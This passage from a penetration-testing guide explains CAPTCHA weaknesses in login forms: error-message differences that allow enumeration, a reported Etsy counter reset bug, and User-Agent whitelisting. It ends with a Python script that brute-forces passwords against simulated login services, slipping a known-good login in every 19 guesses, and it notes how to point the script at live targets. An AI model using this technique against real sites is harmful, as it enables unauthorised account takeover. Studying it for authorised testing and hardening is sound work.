Ethical Hacking and Penetration Testing Guide
Submitting a correct password
When he submitted a correct password, no error was displayed.
Because the response differs between a wrong and a correct password, an attacker could write a Python or Perl script that brute-forces the user accounts by checking each attempt's response for the error message.
CAPTCHA Reset Flaw
Another issue I often test CAPTCHA for is the counter reset flaw. It can be tested by sending a series of incorrect log-in attempts followed by a correct log-in attempt and checking whether CAPTCHA shows up or not.
Let's look at a real-world example of this reset bug, again on etsy.com, caused by a weak CAPTCHA implementation. The bug was found by a security researcher with the nickname "pwndizzle", who discovered two issues while testing the CAPTCHA implementation.
The first issue was a 10 s delay, imposed after the 20th unsuccessful attempt and tracked on a per-IP basis.
The second issue was the CAPTCHA reset bug: after 20 unsuccessful log-in attempts, CAPTCHA was triggered. However, after 19 unsuccessful attempts followed by 1 successful attempt, neither was CAPTCHA triggered nor did the delay occur; the successful log-in reset the failure counter.
An attacker could therefore exploit this by creating an account on etsy.com and using it for the successful log-in attempt. With Burp Intruder or a custom script, he can send a log-in with his own valid credentials after every 19 guesses, so the counter never reaches 20.
The screenshot tells the story: after the 20th attempt there is a delay of 10 s before another attempt is made. After the researcher sent a legitimate request as the 27th request, the delay dropped to 3 or 4 s.
Manipulating User-Agents to Bypass CAPTCHA and Other Protections
Sometimes it is possible to bypass CAPTCHA, account lockout policies, and IP-based restrictions by manipulating the user-agent. The User-Agent is an HTTP request header that your browser sends to the server; it usually includes details about your browser version, your operating system, and so on.
A custom user-agent can be set by modifying the User-Agent header of the HTTP request. This is easily done with Burp Suite or with a popular Firefox add-on called "User-Agent Switcher", which is probably the better option in my opinion, since it comes with built-in user-agents you can switch between.
We can also create a custom user-agent that is not available by default. To do so, navigate to "Options" under the "User-Agent Switcher" menu and fill in the details.
While testing CAPTCHA and other brute-force protections, you should also check whether any other user-agents are whitelisted, because a whitelisted user-agent can let you bypass restrictions set against brute-force attacks; typically it is mobile user-agents that are exempted.
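The two checks described in this and the previous section (interleaving a known-good log-in every 19 guesses to defeat a resetting counter, and switching User-Agents after the lockout has tripped) can be scripted. The following is an added Python example, not code from the book or from pwndizzle's research. It runs against two simulated log-in services constructed for the example rather than any real site: a flawed one whose per-IP failure counter is cleared by any successful log-in and skipped for mobile User-Agents, and a hardened one that counts failures per IP and target account and ignores the User-Agent. The account names, passwords, IP address, wordlist and User-Agent strings are all made up. To use the probes against an authorised target, replace the `service.login(...)` calls with a real HTTP request (for example via the `requests` library) and map the response to the `Response` fields.

```python
"""Probe a log-in endpoint for a CAPTCHA counter reset flaw and for whitelisted
User-Agents. The service classes are simulated stand-ins constructed for this
example, not a real site; swap `service.login(...)` for real HTTP requests."""
from collections import defaultdict
from dataclasses import dataclass

# Constructed credentials: one account the attacker controls, one being attacked.
VALID_USERS = {"attacker_acct": "knownGoodPass!", "victim": "s3cret-target"}
# Constructed wordlist; the correct password is deliberately the 50th guess.
WORDLIST = [f"password{i}" for i in range(1, 50)] + ["s3cret-target"]
# Constructed User-Agent strings to try once the lockout has tripped.
CANDIDATE_UAS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/115.0",
    "Mozilla/5.0 (Linux; Android 13) Mobile Safari/537.36",
    "Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) Safari/604.1",
    "curl/8.0.1",
]


@dataclass
class Response:
    ok: bool        # credentials accepted
    captcha: bool   # a CAPTCHA challenge came back instead of a log-in result
    delay_s: float  # server-imposed delay before answering


class FlawedLoginService:
    """Assumed model of the weaknesses in the text: a per-IP failure counter
    that (1) is reset by ANY successful log-in from that IP and (2) is skipped
    entirely for whitelisted mobile User-Agents."""
    THRESHOLD = 20
    UA_WHITELIST = ("Mobile", "Android", "iPhone")

    def __init__(self):
        self.failures = defaultdict(int)

    def login(self, ip, user_agent, user, password):
        exempt = any(tag in user_agent for tag in self.UA_WHITELIST)
        if not exempt and self.failures[ip] >= self.THRESHOLD:
            return Response(ok=False, captcha=True, delay_s=10.0)
        if VALID_USERS.get(user) == password:
            self.failures[ip] = 0      # the reset flaw
            return Response(ok=True, captcha=False, delay_s=0.0)
        if not exempt:                 # the whitelist flaw
            self.failures[ip] += 1
        return Response(ok=False, captcha=False, delay_s=0.0)


class HardenedLoginService(FlawedLoginService):
    """Same threshold, but failures are counted per (IP, target account), a
    log-in to a different account does not clear them, and the UA is ignored."""

    def login(self, ip, user_agent, user, password):
        key = (ip, user)
        if self.failures[key] >= self.THRESHOLD:
            return Response(ok=False, captcha=True, delay_s=10.0)
        if VALID_USERS.get(user) == password:
            self.failures[key] = 0
            return Response(ok=True, captcha=False, delay_s=0.0)
        self.failures[key] += 1
        return Response(ok=False, captcha=False, delay_s=0.0)


def probe_counter_reset(service, ip, user_agent, target, wordlist, reset_every=19,
                        known_user="attacker_acct", known_password="knownGoodPass!"):
    """Guess passwords for `target`, sending one known-good log-in to the
    attacker's own account after every `reset_every` guesses. Stops at the first
    CAPTCHA (protection held) or the first accepted password (protection failed)."""
    result = {"sent": 0, "captcha": False, "max_delay": 0.0, "cracked": None}
    for i, guess in enumerate(wordlist, start=1):
        r = service.login(ip, user_agent, target, guess)
        result["sent"] += 1
        result["max_delay"] = max(result["max_delay"], r.delay_s)
        if r.captcha:
            result["captcha"] = True
            break
        if r.ok:
            result["cracked"] = guess
            break
        if i % reset_every == 0:   # the 20th request is the legitimate log-in
            service.login(ip, user_agent, known_user, known_password)
    return result


def probe_ua_bypass(service, ip, target, baseline_ua, candidate_uas, threshold=20):
    """Trip the lockout with `baseline_ua`, then report which candidate
    User-Agents are still served without a CAPTCHA. Returns None if the
    lockout never triggered, because then there is nothing to bypass."""
    for _ in range(threshold):
        service.login(ip, baseline_ua, target, "not-the-password")
    if not service.login(ip, baseline_ua, target, "not-the-password").captcha:
        return None
    return [ua for ua in candidate_uas
            if not service.login(ip, ua, target, "not-the-password").captcha]


if __name__ == "__main__":
    ip, desktop_ua = "203.0.113.5", CANDIDATE_UAS[0]
    for cls in (FlawedLoginService, HardenedLoginService):
        print(cls.__name__, probe_counter_reset(cls(), ip, desktop_ua, "victim", WORDLIST))
        print(cls.__name__, probe_ua_bypass(cls(), ip, "victim", desktop_ua, CANDIDATE_UAS))
```

Against the flawed service the reset probe recovers the password on the 50th guess without ever seeing a CAPTCHA, and the bypass probe reports the two mobile User-Agents; against the hardened service the reset probe is stopped by a CAPTCHA on the 21st guess and no User-Agent gets through. When you run the probes against a live target, compare response times as well as the CAPTCHA flag, since the delay the researcher observed is itself evidence that the counter is, or is not, being reset.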
